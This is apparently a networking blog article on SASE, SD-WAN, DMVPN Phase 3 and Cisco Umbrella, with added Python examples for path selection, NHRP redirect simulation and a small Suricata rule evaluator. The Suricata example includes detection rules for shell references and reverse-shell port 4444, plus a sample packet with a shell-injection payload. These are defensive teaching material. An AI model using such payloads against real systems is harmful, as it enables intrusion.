1: Enhanced User Experience: With performance-based routing, data packets are directed through the fastest and most reliable paths, minimizing latency and packet loss. This results in a superior user experience, faster page load times, smoother video streaming, and reduced buffering.

2: Increased Network Efficiency: Performance-based routing optimizes bandwidth usage by dynamically adapting to changing network conditions. It automatically reroutes traffic away from congested links, distributing it evenly and reducing bottlenecks. This leads to improved overall network efficiency and better utilization of available resources.

3: Improved Reliability and Redundancy: Performance-based routing enhances network reliability by actively monitoring link performance. In case of link failures or degraded performance, it can dynamically reroute traffic to alternative paths, ensuring seamless connectivity and minimizing service disruptions.
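The selection logic described above, as an added example in Python (illustrative code written for this page, not Cisco PfR or any vendor's implementation): each path carries its latest probe results, each application class carries an SLA, and the selector stays on a compliant path, moves when that path breaches the SLA, and falls back to a scored least-bad choice only when nothing complies. Path names, SLA bounds and probe values are constructed.

```python
"""Performance-based path selection: an added example, not vendor code.
Paths carry measured latency/loss/free bandwidth; application classes carry an
SLA; the selector is sticky on a compliant path to avoid flapping. Probe values
and SLA bounds below are constructed."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class PathStats:
    name: str
    latency_ms: float
    loss_pct: float
    free_bw_mbps: float
    up: bool = True


@dataclass
class AppSla:
    max_latency_ms: float
    max_loss_pct: float
    min_bw_mbps: float


def meets_sla(path: PathStats, sla: AppSla) -> bool:
    """A path complies only if it is up and every measured metric is within the SLA."""
    return (path.up
            and path.latency_ms <= sla.max_latency_ms
            and path.loss_pct <= sla.max_loss_pct
            and path.free_bw_mbps >= sla.min_bw_mbps)


def badness(path: PathStats, sla: AppSla) -> float:
    """Composite score used only when no path complies. Each metric is normalised
    to its SLA bound; loss is weighted highest because it hurts real-time traffic
    most; bandwidth counts only as a shortage below the minimum."""
    return (path.latency_ms / sla.max_latency_ms
            + 4.0 * path.loss_pct / max(sla.max_loss_pct, 0.01)
            + 2.0 * max(0.0, 1.0 - path.free_bw_mbps / max(sla.min_bw_mbps, 1.0)))


def select_path(paths: List[PathStats], sla: AppSla,
                current: Optional[str] = None) -> Optional[str]:
    """Return the name of the path this application class should use now."""
    by_name = {p.name: p for p in paths}
    # Stickiness: do not move traffic off a path that still meets its SLA,
    # otherwise every small jitter in the probes would reroute flows.
    if current in by_name and meets_sla(by_name[current], sla):
        return current
    compliant = [p for p in paths if meets_sla(p, sla)]
    if compliant:
        return min(compliant, key=lambda p: p.latency_ms).name
    alive = [p for p in paths if p.up]
    if not alive:
        return None
    return min(alive, key=lambda p: badness(p, sla)).name


# Constructed probe results for three WAN paths and two application classes.
VOICE = AppSla(max_latency_ms=150, max_loss_pct=1.0, min_bw_mbps=2)
BULK = AppSla(max_latency_ms=500, max_loss_pct=5.0, min_bw_mbps=20)
PATHS = [
    PathStats("mpls", latency_ms=40, loss_pct=0.1, free_bw_mbps=5),
    PathStats("inet1", latency_ms=25, loss_pct=0.0, free_bw_mbps=50),
    PathStats("lte", latency_ms=90, loss_pct=2.0, free_bw_mbps=10),
]

if __name__ == "__main__":
    print("voice:", select_path(PATHS, VOICE))                 # inet1: compliant, lowest latency
    print("voice on mpls:", select_path(PATHS, VOICE, "mpls"))  # stays on mpls while it complies
    print("bulk:", select_path(PATHS, BULK))                   # inet1: only path with 20 Mbps free
```

The stickiness check matters in practice: without it, a probe that oscillates around the threshold would move flows back and forth every interval, which for voice is worse than a slightly slower but stable path.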

SD-WAN with DMVPN Phase 3

**Understanding DMVPN Phase 3**

DMVPN, short for Dynamic Multipoint VPN, is a Cisco technology that simplifies the deployment of VPN networks. All DMVPN phases rely on the Next Hop Resolution Protocol (NHRP) to map overlay tunnel addresses to underlay (NBMA) addresses; what Phase 3 adds is NHRP redirect and shortcut signalling. The hub can now advertise summary routes to the spokes, and when spoke-to-spoke traffic first transits the hub, the hub sends the source spoke a redirect; the spoke resolves the destination and installs a shortcut so later traffic flows directly between spokes. This keeps spoke routing tables small while taking the hub out of the data path, which is what reduces latency.

**Implementing DMVPN Phase 3**

Implementing DMVPN Phase 3 requires careful planning and configuration. The process involves establishing a hub-and-spoke topology in which the hub acts as the central point of communication and each spoke registers with it. Configuring NHRP (redirect on the hub, shortcut on the spokes) and IPsec protection of the mGRE tunnels are the crucial steps; without IPsec, NHRP registrations and the GRE-encapsulated traffic cross the underlay in the clear.
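The Phase 3 exchange described above, simulated as an added example in Python (not Cisco code; hub, spoke, overlay and NBMA addresses are constructed values): spokes register with the hub, the first spoke-to-spoke packet transits the hub and earns an NHRP redirect, the source spoke resolves the destination and installs a shortcut, and the next packet goes direct.

```python
"""DMVPN Phase 3 NHRP redirect/shortcut, simulated: an added example, not Cisco code.
The hub advertises only a summary route, so spoke-to-spoke traffic first goes via
the hub; the hub answers with an NHRP traffic indication (redirect), the spoke
resolves the destination and installs a shortcut. Addresses are constructed;
a real deployment protects every tunnel with IPsec."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass
class Node:
    name: str
    tunnel_ip: str                       # overlay (mGRE) address
    nbma_ip: str                         # underlay / public address
    lans: List[str] = field(default_factory=list)
    nhrp_cache: Dict[str, str] = field(default_factory=dict)   # tunnel_ip -> nbma_ip
    routes: Dict[str, str] = field(default_factory=dict)       # prefix -> next-hop tunnel_ip


SUMMARY = "10.0.0.0/8"


def prefix_of(ip: str) -> str:
    """Toy longest-match: every LAN in this demo is a /24."""
    return ip.rsplit(".", 1)[0] + ".0/24"


class Dmvpn:
    def __init__(self, hub: Node):
        self.hub = hub
        self.spokes: Dict[str, Node] = {}    # keyed by tunnel_ip
        self.log: List[str] = []

    def register(self, spoke: Node) -> None:
        """NHRP Registration Request from the spoke to its configured NHS (the hub)."""
        self.spokes[spoke.tunnel_ip] = spoke
        spoke.nhrp_cache[self.hub.tunnel_ip] = self.hub.nbma_ip    # static NHS mapping
        self.hub.nhrp_cache[spoke.tunnel_ip] = spoke.nbma_ip       # learned from registration
        for lan in spoke.lans:
            self.hub.routes[lan] = spoke.tunnel_ip
        spoke.routes[SUMMARY] = self.hub.tunnel_ip                 # Phase 3: summary via hub
        self.log.append(f"{spoke.name} -> hub: registration {spoke.tunnel_ip}@{spoke.nbma_ip}")

    def send(self, src: Node, dst_ip: str) -> str:
        """Forward one data packet from a spoke; returns 'hub', 'direct' or 'dropped'."""
        next_hop = src.routes.get(prefix_of(dst_ip)) or src.routes[SUMMARY]
        if next_hop != self.hub.tunnel_ip:
            peer = self.spokes[next_hop]
            self.log.append(f"{src.name} -> {peer.name}@{src.nhrp_cache[next_hop]}: data (shortcut)")
            return "direct"
        spoke_ip = self.hub.routes.get(prefix_of(dst_ip))
        if spoke_ip is None:
            self.log.append(f"hub: no route to {dst_ip}, dropped")
            return "dropped"
        target = self.spokes[spoke_ip]
        self.log.append(f"{src.name} -> hub@{src.nhrp_cache[next_hop]} -> {target.name}: data")
        # The hub forwarded the packet out the same mGRE interface it arrived on,
        # so with 'ip nhrp redirect' it tells the source that a better path exists.
        self.log.append(f"hub -> {src.name}: NHRP traffic indication (redirect) for {dst_ip}")
        self._resolve(src, dst_ip, target)
        return "hub"

    def _resolve(self, src: Node, dst_ip: str, target: Node) -> None:
        """'ip nhrp shortcut' on the spoke: request goes via the hub, reply comes direct."""
        self.log.append(f"{src.name} -> hub: NHRP resolution request for {dst_ip}")
        self.log.append(f"hub -> {target.name}: resolution request forwarded")
        # The reply carries the target's tunnel/NBMA pair and is sent straight to
        # the requester's NBMA address, which was carried in the request.
        self.log.append(f"{target.name} -> {src.name}@{src.nbma_ip}: resolution reply "
                        f"{prefix_of(dst_ip)} via {target.tunnel_ip}@{target.nbma_ip}")
        src.nhrp_cache[target.tunnel_ip] = target.nbma_ip
        target.nhrp_cache[src.tunnel_ip] = src.nbma_ip
        src.routes[prefix_of(dst_ip)] = target.tunnel_ip           # NHRP shortcut route


def build_demo() -> Tuple[Dmvpn, Node, Node]:
    hub = Node("hub", "192.168.0.1", "203.0.113.1")
    a = Node("spokeA", "192.168.0.2", "198.51.100.2", ["10.1.1.0/24"])
    b = Node("spokeB", "192.168.0.3", "198.51.100.3", ["10.2.2.0/24"])
    net = Dmvpn(hub)
    net.register(a)
    net.register(b)
    return net, a, b


if __name__ == "__main__":
    net, a, b = build_demo()
    net.send(a, "10.2.2.10")    # first packet: via hub, triggers redirect + resolution
    net.send(a, "10.2.2.10")    # second packet: spoke-to-spoke shortcut
    print("\n".join(net.log))
```

Note that the return direction is resolved separately: after spoke A has its shortcut, spoke B's first reply packet still goes via the hub and triggers its own redirect, exactly as in the simulation.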

Understanding SASE

SASE, pronounced “sassy,” is a transformative approach to network security that combines network and security functionalities into a unified cloud-based service. It converges wide area networking (WAN) capabilities with comprehensive security functions, all delivered as a service. SASE aims to simplify and streamline network security, providing organizations with a more efficient and scalable solution.

–SASE Components:

SASE is built upon several key components that work together. These include secure web gateways (SWG), cloud access security brokers (CASB), firewall-as-a-service (FWaaS), zero-trust network access (ZTNA), and software-defined wide area networking (SD-WAN). Each component is vital in creating a robust and comprehensive security framework.

–SASE Solutions:

SASE solutions generally consist of a networking component, such as a software-defined wide area network (SD-WAN), plus a wide range of security components offered in cloud-native format.

These security components are added to secure the network’s communication from end to end, provide consistent policy management and enforcement, add security analytics, and enable an integrated administration capability to manage every connection from everything to every resource.

Some of these features commonly include Zero Trust Network Access (ZTNA), which means a Zero Trust approach to security is one of the security components that enables SASE. Therefore, SASE is dependent on Zero Trust.

–Note: The first layer of defense:

I always consider DNS-layer security the first layer. Every transaction starts with a DNS request, so it is an excellent place to begin enforcing security. If a customer needs an additional measure of defense, the other security functions that Cisco Umbrella offers can be introduced on top, and you turn individual functions on and off as you see fit.

Example SASE Technology: IPS IDS

Understanding Suricata

Suricata is an open-source intrusion detection and prevention system (IDS/IPS) built for high-speed network traffic analysis. It uses multi-threading and a rule-based detection engine to inspect traffic for signs of compromise, generating alerts in IDS mode and dropping matching traffic when deployed inline as an IPS. Its extensive protocol logging also makes it useful beyond signature matching, for example as a source of network telemetry for a SOC.

Suricata offers an extensive feature set for efficient threat detection and prevention. Its rule-based engine allows customizable rule sets, so policy can be tailored to the environment. Suricata parses transport protocols such as TCP, UDP, and ICMP and, on top of them, application protocols such as HTTP, DNS, TLS, and SMB, which lets rules match on protocol fields rather than raw bytes alone. Advanced features such as file extraction, TLS metadata logging and JA3 fingerprinting, and automatic protocol detection on non-standard ports add another layer of depth. One caveat: Suricata does not decrypt TLS; it inspects the handshake and can be fed already-decrypted traffic from a TLS proxy, but encrypted payloads are otherwise opaque to its content matching.
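To make the rule-based engine concrete, an added example (not Suricata's code) that parses a handful of Suricata-syntax rules and applies them to constructed packets. It supports only the header fields and the msg, content (with |hex| and nocase) and sid options; the $HOME_NET value, the rules and the packets are all assumptions made for the demo.

```python
"""Minimal evaluator for Suricata-syntax rules: an added example, not Suricata's engine.
Shows how a rule header (action, protocol, addresses, ports, direction) and the
msg / content (with |hex| and nocase) / sid options are applied to traffic.
$HOME_NET, the rules and the packets below are constructed for the demo."""
import ipaddress
import re

VARS = {"$HOME_NET": "10.0.0.0/8", "$EXTERNAL_NET": "!10.0.0.0/8"}   # assumed values
HEADER_RE = re.compile(
    r"^(?P<action>alert|drop|pass)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)"
    r"\s+(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s+\((?P<opts>.*)\)\s*$")


def content_bytes(text):
    """Suricata content syntax: literal text with |hex bytes| between pipes."""
    return b"".join(bytes.fromhex(p) if i % 2 else p.encode()
                    for i, p in enumerate(text.split("|")))


def parse_rule(line):
    m = HEADER_RE.match(line.strip())
    if not m:
        raise ValueError(f"bad rule: {line}")
    rule = m.groupdict()
    rule["contents"] = []                       # [pattern, nocase]; all must match
    for opt in filter(None, (o.strip() for o in rule.pop("opts").split(";"))):
        key, _, val = opt.partition(":")
        val = val.strip().strip('"')
        if key == "content":
            rule["contents"].append([content_bytes(val), False])
        elif key == "nocase" and rule["contents"]:
            rule["contents"][-1][1] = True      # modifier applies to the preceding content
        elif key == "sid":
            rule["sid"] = int(val)
        else:
            rule[key] = val                     # msg, rev, flow, ... kept verbatim
    return rule


def addr_match(spec, ip):
    if spec == "any":
        return True
    spec = VARS.get(spec, spec)
    neg = spec.startswith("!")
    net = ipaddress.ip_network(spec.lstrip("!"), strict=False)
    return (ipaddress.ip_address(ip) in net) != neg


def port_match(spec, port):
    if spec == "any":
        return True
    neg = spec.startswith("!")
    hit = False
    for item in spec.lstrip("!").strip("[]").split(","):
        lo, sep, hi = item.partition(":")       # "80", "1024:", "1:1023"
        hit |= int(lo or 0) <= port <= int(hi or 65535) if sep else port == int(lo)
    return hit != neg


def header_match(rule, pkt):
    if rule["proto"] not in ("ip", pkt["proto"]):
        return False

    def one_way(s, sp, d, dp):
        return (addr_match(rule["src"], s) and port_match(rule["sport"], sp)
                and addr_match(rule["dst"], d) and port_match(rule["dport"], dp))

    fwd = one_way(pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
    if fwd or rule["dir"] == "->":
        return fwd
    return one_way(pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])   # "<>" either way


def payload_match(rule, payload):
    for pattern, nocase in rule["contents"]:
        hay, needle = (payload.lower(), pattern.lower()) if nocase else (payload, pattern)
        if needle not in hay:
            return False
    return True


def detect(rules, packets):
    """Return (packet index, sid, msg) for every rule each packet triggers."""
    parsed = [parse_rule(r) for r in rules]
    return [(i, r["sid"], r.get("msg", "")) for i, pkt in enumerate(packets)
            for r in parsed if header_match(r, pkt) and payload_match(r, pkt["payload"])]


# Constructed rules in Suricata syntax and constructed packets (no real traffic).
RULES = [
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Shell reference in HTTP request"; '
    'content:"GET "; content:"/bin/sh"; nocase; sid:1000001; rev:1;)',
    'alert tcp $HOME_NET any -> $EXTERNAL_NET 4444 (msg:"Outbound to common reverse-shell port"; '
    'sid:1000002; rev:1;)',
    'alert udp any any -> any 53 (msg:"DNS query for bad.example.com"; '
    'content:"|03|bad|07|example|03|com|00|"; nocase; sid:1000003; rev:1;)',
]
PACKETS = [
    dict(proto="tcp", src="203.0.113.5", sport=51000, dst="10.1.1.10", dport=80,
         payload=b"GET /cgi-bin/x?cmd=/BIN/SH HTTP/1.1\r\n"),
    dict(proto="tcp", src="10.1.1.10", sport=40000, dst="203.0.113.5", dport=4444, payload=b""),
    dict(proto="udp", src="10.1.1.10", sport=5353, dst="10.0.0.53", dport=53,
         payload=b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03bad\x07example\x03com\x00\x00\x01\x00\x01"),
    dict(proto="tcp", src="10.1.1.10", sport=40001, dst="10.2.2.2", dport=4444, payload=b""),   # internal: no alert
]

if __name__ == "__main__":
    for hit in detect(RULES, PACKETS):
        print(hit)
```

The fourth packet shows why address variables matter: the same port 4444 to an internal host does not trip the reverse-shell rule because $EXTERNAL_NET is defined as the negation of $HOME_NET. The DNS rule matches the wire encoding of the name (length-prefixed labels), which is why the content uses |hex| bytes rather than dots.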

The Synergy of SASE and SD-WAN Integration

When SASE and SD-WAN are combined, a networking solution delivers the best of both worlds. By integrating SD-WAN capabilities into the SASE architecture, organizations can simultaneously leverage the benefits of secure connectivity and optimized network performance. This integration allows for intelligent traffic routing based on security policies, ensuring that sensitive data flows through secure channels while non-critical traffic takes advantage of optimized paths.

One significant advantage of integrating SASE and SD-WAN is simplified network management. With a unified platform, IT teams can centrally manage and monitor network connectivity, security policies, and performance. This centralized approach eliminates the need for complex and fragmented network management tools, streamlining operations and reducing administrative overhead.

**Use Case: DMVPN and SD-WAN**

**Example: DMVPN over IPSec**

DMVPN is a tunneling protocol that allows for the creation of virtual private networks over a public network infrastructure. Unlike traditional VPNs, DMVPN offers a dynamic and scalable architecture, making it ideal for large-scale deployments. By leveraging multipoint GRE (Generic Routing Encapsulation), DMVPN enables direct communication between remote sites without needing a full-mesh topology. This significantly simplifies network management and reduces overhead.

**DMVPN & Security**

IPsec, short for Internet Protocol Security, is a widely adopted protocol suite that provides secure communication over IP networks. It offers confidentiality, integrity, and authentication services, ensuring that data transmitted between network nodes remains secure and tamper-proof. IPsec establishes a secure channel between DMVPN nodes by encrypting IP packets and protecting sensitive information from unauthorized access.

**Combining DMVPN and IPsec**

The combination of DMVPN and IPsec benefits organizations seeking robust and scalable networking solutions. Firstly, DMVPN’s dynamic architecture allows for easy scalability, making it suitable for businesses of all sizes. Additionally, using IPsec ensures end-to-end security, safeguarding data from potential threats. Moreover, by eliminating the need for a full-mesh topology, DMVPN reduces administrative overhead, simplifying network management processes.

DMVPN Single Hub, Dual Cloud Architecture

The single hub, dual cloud configuration takes DMVPN to the next level by enhancing redundancy and performance. This architecture connects a central hub to two separate cloud providers, creating a highly resilient and highly available network infrastructure. This setup ensures the network remains operational even if one cloud provider experiences downtime, minimizing disruptions and maximizing uptime.

a. Enhanced Redundancy: The single hub, dual cloud DMVPN architecture significantly improves network redundancy by connecting to two cloud providers. In a cloud provider outage, traffic is automatically rerouted to the alternate cloud, ensuring seamless connectivity and minimal impact on business operations.

b. Optimized Performance: With dual cloud connectivity, the network can distribute traffic intelligently, leveraging the resources of both cloud providers. This load balancing enhances network performance, efficiently utilizing available bandwidth and minimizing latency.

c. Scalability: Single hub, dual cloud DMVPN offers scalability, enabling businesses to expand their network infrastructure as their requirements grow easily. New sites can seamlessly integrate into the architecture without compromising performance or security.

Related: Before you proceed, you may find the following posts helpful as background:

  1. SASE Definition
  2. DNS Security Solutions
  3. Cisco Umbrella CASB
  4. SASE Model
  5. Secure Firewall
  6. SASE Visibility
  7. Zero Trust SASE

SASE Networking

Starting SASE Networking

The common goal is to move users closer to the cloud services they access. However, traffic sent over the Internet is best-effort, exposed to attacks by bad actors, and subject to unforeseen performance problems. Over 14,000 BGP incidents occurred last year, so when BGP is unstable, cloud access over the Internet varies with it.

No one approach solves everything, but deploying SASE ( secure access service edge ) will give you a solid posture. Secure Access Service Edge deployment is not something you take out of a box and plug in.

A careful strategy is needed, and I recommend starting with SD-WAN. Specifically, adding security to SD-WAN creates an SD-WAN SASE design. SD-WAN is now mainstream, and cloud security integration is becoming critical, enabling enterprises to evolve to a cloud-based SASE architecture. Cisco's cloud-delivered security component of SASE is Cisco Umbrella.

**Security SASE**

As organizations have shifted how they connect their distributed workforce to distributed applications in any location, the convergence of networking and cloud security has never been more critical. And that is what security SASE is all about—bringing these two pillars together and enabling them from several cloud-based PoPs.

Designing, deploying, and managing end-to-end network security is essential in today’s constant attacks. Zero Trust SASE lays the foundation for customers to adopt a cloud-delivered policy-based network security service model.

**SD-WAN SASE**

Then, we have Cisco SD-WAN, a cornerstone of the SASE Solution. In particular, Cisco SD-WAN integration with Cisco Umbrella enables networks to access cloud workloads and SaaS applications securely with one-touch provisioning, deployment flexibility, and optimized performance.

We have several flexible options for journeying to SASE Cisco with Cisco SD-WAN. Cisco has a good solution combining Cisco SD-WAN and cloud-native security, Cisco Umbrella, into a single offering that delivers complete protection. We will get to how this integrates in just a moment.

However, to reach this integration point, you must first understand the stage in your SASE journey. Everyone will be at different stages of the SASE journey, with unique networking and security requirements. For example, you may still be at the SD-WAN with on-premises security.

Then, others may be further down the SASE line with SD-WAN and Umbrella SIG integration or even partially at a complete SASE architecture. As a result, there will be a mixture of thick and thin branch site designs.

SASE Network: First steps 

A mix of SASE journey types will be expected, but you need a consistent, unique policy over this SASE deployment mix. Therefore, we must strive for a compatible network and security function anywhere for continuous service. 

As a second stage to consider, most are looking for multi-security services, not just a CASB or a Firewall. A large number of organizations are looking for multi-function cloud security services. Once you move to the cloud, you will increase efficiency and benefit from multi-functional cloud-delivered security services.

SASE Network: Combined all security functions

So, the other initial step to SASE is to combine security services into a cloud-delivered service. All security functions are now delivered from one place, dispersed globally with PoPs. This can be done with Cisco Umbrella, a multi-function security SASE solution.

Cisco Umbrella integrates multiple services to manage protection and has all of this on one platform. Then, you can deploy it to the locations where it is needed. For example, some sites only need the DNS-layer filtering; for others, you may need full CASB and SWGs.

SASE Network: Combine security with networking 

Once we have combined all security functions, we need to integrate networking into security, which requires a flexible approach to meeting multi-cloud at scale. This is where we can introduce SD-WAN as a starting point of convergence. SD-WAN’s benefits are clear: dynamic segmentation, application optimization, cloud networking, integrated analytics, and assurance. So, we are covering technology stacks and how the operations team consumes the virtual overlay features.

Cisco SD-WAN use cases can help you transform your WAN edge with deeper cloud integration and rapid access to SASE Cisco: Cisco Umbrella cloud security can be enabled from the SD-WAN controller, and vice versa. This is a good starting point.

Secure Access Service Edge

New connectivity structures: Let us rewind for a moment. The concept of Secure Access Service Edge rests on several drivers. Several products can be combined to form a SASE offering, but the main reason for SASE is the major shift in the IT landscape.

We have different types of people connecting to the network, using our network to get to the cloud, or there can be direct cloud access. This has driven the requirements for a new security architecture to match these new connectivity structures. Nothing can be trusted, so you need to evolve your connectivity requirements. 

Shift workloads to the cloud: Workloads have moved to the cloud, so there are better approaches than backhauling users to the data center to reach cloud applications. Backhauling to a central data center for cloud-hosted applications wastes resources and should be reserved for applications that cannot be placed in the cloud; for everything else it adds application latency and makes the user experience unpredictable. The cloud drives a significant shift in network architecture, and you should take advantage of it.

SASE Network: New SASE design

Initially, we had a hub-and-spoke architecture with traditional appliances, but we have moved to a design where we deliver network and security capabilities. This puts the Internet at the center, creating a global cloud edge that makes sense for users to access, not just go to central data because it’s there. 

This is the paradigm shift we are seeing with the new SASE architecture. So, users can connect directly to this new cloud edge, the main headquarters can join the cloud edge, and branch offices can connect via SD-WAN to the cloud edge.

This cloud edge fronts the data and applications users need. The other security and network functions each cloud-edge PoP provides can then be turned on as a suite for the branch site or remote user connecting to it.

1) The need for DIA

Firstly, most customers want to use Direct Internet Access (DIA) circuits because they no longer want the data center to be the aggregation point for most traffic going to the cloud. Some applications then add complications or specific requirements; Office 365 is the usual example.

In this case, Microsoft's connectivity guidance is specific: Office 365 traffic in the "Optimize" category should not be sent through a proxy or inspected, and it should egress directly to the Internet as close to the user as possible. Office 365 therefore calls for DIA and an explicit bypass in the SASE policy rather than being hairpinned through a proxy.

2) Identity Security

Then, we consider identity and identity security. There are new endpoints and identities to consider, and multiple contextual factors go into determining the risk level of an identity requesting access. Now that the perimeter has shifted, how do I keep complete visibility of traffic flows and drive consistent identity-driven policy, not just for the user but also for the device?

3) Also, segmentation. How do you extend your segmentation strategy to the cloud and open up new connectivity models? For segmentation, you want to isolate all your endpoints, and this may include IoT, CCTV, and other devices. 

**Identity Security Technologies**

Multi-factor authentication (MFA) can be used here, and we can combine multiple authentication factors to grant access. This needs to be a continuous process. I’m also a big fan of Just in Time access. Here, we only give access to a particular segment for a specific time. Once that time is up, access is revoked. This certainly reduces the risk of Malware spreading. In addition, you can isolate privileged sessions and use step-up authentication to access critical assets.

Security SASE 

SASE Cisco converges networking, connectivity, and security into a single cloud-delivered service. It is an alternative to the traditional on-premises approach to protection: instead of separate silos for network and security, SASE unifies networking and security services and delivers edge-to-edge protection.

All-in-one box

SASE is more of a journey to reach than an all-in-one box you can buy and turn on. We know SASE entails Zero Trust Network Access (ZTNA), SD-WAN, CASB, FWaaS, RBI, and SWG, to name a few. 

An effective SASE consolidates security and threat protection through a single vendor with a global presence and peering relationships.

**SASE connectivity: SD-WAN SASE**

Connectivity is where we need to connect users anywhere to applications everywhere. This is where the capabilities of SD-WAN SASE come into play. SD-WAN brings advanced technologies such as application-aware routing, WAN optimization, per-segment topologies, and dynamic tunnels.

**SD-WAN Driving Connectivity** 

Now, we have SD-WAN that can handle the connectivity side of things. Then, we need to move to control based on the security side. Control is required for end-to-end threat visibility and security. So, even though the perimeter has shifted, you still need to follow the zero trust model outside of the traditional boundary. 

Multiple forms of security drive SASE that can bring this control; the main ones are secure web gateways, cloud-delivered firewalls, cloud access security brokers, DNS layer security, and remote browser isolation. We need these network and security central pillars to converge into a unified model, which can be provided as a software-as-a-service model.

**Building the SASE architecture** 

There can be several approaches to forming this architecture. We can have a Virtual Machine (VM) for each of the above services, place it in the cloud, and then call this SASE. However, too many hops between network and security services in the VM design will introduce latency. As a result, we need to have a SASE approach that is born for the cloud. A bunch of VMs for each network and security service is not a scalable approach.

SASE: Microservices Architecture

Therefore, a better approach would be to have a microservices, multi-tenancy container architecture with the flexibility to optimize and scale. Consider the SASE architecture to be cloud-native.

A multitenant cloud-native approach to WAN infrastructure enables SASE to service any edge endpoint, including the mobile workforce, without sacrificing performance or security. It also means the complexities of upgrades, patches, and maintenance are handled by the SASE vendor and abstracted away from the enterprise.

Cisco Umbrella is built on a cloud-native microservices architecture. However, Umbrella alone does not provide SASE; it must be integrated with other Cisco products to form the SASE architecture. Let's start with Cisco SD-WAN.

Cisco SD-WAN: Creating SD-WAN SASE

SD-WAN grew in popularity as a more agile and cloud-friendly approach to WAN connectivity. With large workloads shifting to the cloud, SD-WAN gave enterprises a more reliable alternative to Internet-based VPN and a more agile, affordable alternative to MPLS for several use cases.

Underlay – Overlay Network Design

In addition, by abstracting away underlying network transports and enabling a software-defined approach to the WAN, SD-WAN helped enterprises improve network performance and address challenges such as the high costs of MPLS bandwidth and the trombone-routing problem. 

SD-WAN is essential for SASE success and is a crucial building block for it. SASE cannot deliver ubiquitous security without the safeguards SD-WAN provides, including:

  • Enabling Network Address Translation (NAT)
  • Segmenting the network into multiple subnetworks
  • Firewalling unwanted incoming and VLAN-to-VLAN traffic
  • Securing site-to-site/in-tunnel VPN

So, SD-WAN can ride on top of any transport, whether you have an MPLS or internet breakout, and onboard any users and consumption model. This is a good starting point for SASE. Here, we can use SD-WAN embedded security as a starting point for SASE.  

SD-WAN Security Stack: SD-WAN SASE

The SD-WAN security stack is consistent on-premises and in the cloud. SD-WAN supports an enterprise firewall that is layer-7 aware, an intrusion prevention system built on Snort, URL filtering, advanced malware protection, and an SSL/TLS proxy.

Everything except the enterprise firewall runs as a container on the WAN edge, and automated security templates exist for all of it. Based on the intent expressed in the template, vManage, the SD-WAN management component, pushes the configuration to the WAN edge so that the security services are turned on.

All of this is driven by automated templates from the SD-WAN controller, which also configures Cisco Umbrella from Cisco SD-WAN. What I find helpful is the integration between vManage and Umbrella, which streamlines security: the automated templates in vManage are what you use to enable the corresponding functionality in Cisco Umbrella.

Cisco Umbrella: Enabling Security SASE

The next level of the SASE journey would be with Cisco Umbrella. So, we still have the SD-WAN network and security capabilities enabled. An SD-WAN fabric provides a secure connection to connect to Cisco Umbrella, gaining all the benefits of the SD-WAN connecting model, such as auto tunnel and intelligent traffic steering.

This is combined with Cisco Umbrella's cloud security capabilities. With the two products together, we begin to fill out the defense-in-depth layers of security functions, and multiple security features work together to strengthen the security posture.

SD-WAN SASE: Connecting the SASE Network 

SD-WAN connects to Cisco Umbrella over an IPsec tunnel. The tunnel is set up by pushing the SIG feature template, so there is no need to configure a tunnel by hand on each WAN edge at the branch.

The IPsec tunnels at the branch are auto-created to the Cisco Umbrella headend. This is the deep integration and automation between Cisco SD-WAN and Cisco Umbrella: you don't need to design the tunnels; it is done for you. Do still verify what the template negotiated (IKE version, encryption and integrity algorithms, and the tunnel source interface), since an automatically built tunnel is only as strong as the defaults it was given.

IPsec Tunnel Capabilities

What IPsec capabilities do you have? Each IPsec tunnel supports 250 Mbps and can burst higher if needed. For larger deployments, multiple tunnels can be deployed for higher capacity, so active-active tunnels can be created for more throughput. The design is also highly available: you have an IPsec tunnel established to the primary Cisco Umbrella PoP.

If that Umbrella PoP goes down, all the services can be mapped to a secondary Umbrella data center in the same or a different region. It is unlikely that two SASE PoPs in the same region go down at once.

Hybrid Anycast handles the failure to secondary SASE PoP or DR site. You don’t need to design this; it is done automatically for you. So, with this design, Cisco has what is known as a unified deployment template called the “Secure Internet Gateway Template.” 

Active-active tunnels

The Cisco SD-WAN vManage auto-template allows up to four active tunnels at 250 Mbps each from a single device, and Cisco SD-WAN can ECMP load-balance traffic across them. Eight tunnels can be configured, but only four can be active.

These tunnels are established from a single Public IP address using NAT-T, which opens up various design options. Now, you can have active-active tunnels, weighted load balancing, and flexible traffic engineering with a unique template.

Each tunnel supports 250 Mbps, and with four tunnels in ECMP the branch can push an aggregate of 1 Gbps to the Cisco Umbrella headend. Note that the load balancing is per flow, so a single large flow is still limited to one tunnel's 250 Mbps; the 1 Gbps figure is reached only when enough flows hash across all four tunnels.

IPsec Tunnel configuration 

For weighted load balancing, take two tunnels to Cisco Umbrella with the same weight, over two DIA circuits of the same bandwidth. When the weights are equal across the different ISPs, the traffic is load-balanced equally. Cisco uses per-flow rather than per-packet load balancing: a flow is pinned to a tunnel by hashing its 4-tuple (source and destination IP address and port), so the packets of one flow always take the same tunnel and do not arrive out of order.

So, for example, there will be a static route pairing to both tunnels, and the metric will be the same; you can also have an unequal-cost multi-path use case. You may have small branch sites with dual DIA circuits and different bandwidths and entitlements.

Traffic can be steered at 80:20 over the DIA circuits to optimize the WAN. If you had a static route statement, you would see different metrics. 

Policy-Based Routing to Cisco Umbrella

You can also use policy-based routing to Cisco Umbrella, which allows flexible traffic engineering. For example, you may want only specific application traffic sent from a branch to Umbrella: at branch 1, send only selected SaaS applications such as Office 365 or GitHub to Cisco Umbrella; at branch 2, send all traffic, including all cloud- and Internet-bound traffic. The policy can be adapted to each design requirement.

Policy-based routing to Cisco Umbrella lets you select which applications are sent to Umbrella and thereby limit what types of traffic are routed there. Application classification comes from Deep Packet Inspection (DPI) within the data policy, so all of this is expressed as an app-aware data policy.

Layer 7 Health check 

